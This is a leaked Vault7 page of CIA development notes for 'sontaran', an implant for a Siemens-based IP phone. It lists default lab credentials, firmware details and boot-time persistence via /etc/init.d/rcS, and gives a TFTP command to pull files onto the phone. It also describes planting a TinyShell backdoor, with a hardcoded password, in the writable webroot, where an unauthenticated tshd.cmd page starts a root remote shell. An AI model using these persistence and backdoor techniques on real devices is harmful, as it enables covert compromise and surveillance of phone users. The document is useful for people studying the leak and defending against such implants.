Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
sontaran
Development Notes
Credentials
- https://10.3.2.151/
- phone menu password – 123456
- web interface admin – 123456
System Configuration
webroot = /Opera_Deploy/appWeb/web
- Phone runs linux-2.4.31
- Processor is MIPS-BE
- /tmp is reset each time the phone is booted
- for boot time execution, creating /etc/rc.local, /etc/init.d/test.sh, /etc/rc.d/rc3.d/test.sh did not work. Might try modifying /etc/init.d/rcS or /etc/inittab or /etc/profile (per INCA_IP2_LinuxBSP_Rel2.0_UM_PR_Rev1.0.pdf, Section 2.2). /etc/init.d/rcS tested and known to work.
- System loads kernel drivers in /etc/init.d/rcS from /lib/modules/2.4.31-INCAIP2-01.03.00/kernel/drivers/siemens-opera/
Establishing Initial Access for Development
- Use the hive-builder 10.2.5.2 (or another) to cross compile code for the phone.
- The phone temporarily allows SSHSecure Shell access to the admin user via the web interface (Administrator Pages > Maintenance > Secure Shell).
- Files can be transferred to the phone via TFTPFile transfer software (don't forget to chmod a+x the file once it is transferred to the phone).
phone$ tftp -g -r <filename> <hostname> <port>
wkstn$ sudo /usr/sbin/in.tftpd --daemon --port 6969 /tmp (this is for atftpd)
- The web server attempts to execute (yes, execute) any page requested by a client.
- The webroot directory is writable by the admin user.
- TinyShell (tsh) has been compiled for the phone for port 12345 and password "wboKtbEYVTWAVIig". Using the admin user via SSHSecure Shell and TFTP, tsh was put in /usr/sbin and the webroot. Additionally, a script named tshd.cmd has also been placed in the webroot. To start tsh, hit this page https://10.3.2.151/tshd.cmd . Web interface credentials are not required. That page will provide status, and in the background, it will kick off tsh with root privileges. Use the tsh client to connect for root shell.
SDK
- INCA, VMMC, and HAPIHL7 Application Programming Interface driver code in SDKSoftware Development Kit Bundle. Run EASY\Software\TAPIv3\ifx_tapi.run and it will create a folder ifx_tapi with a driver for each folder. Although kernel code, there are several header files for the using....
- Example user-space programs are Linux Board Support Package. Untar EASY\Software\Linux_BSP. In the extracted files, iip2_linuxbsp_02.02.01\source\user\ifx.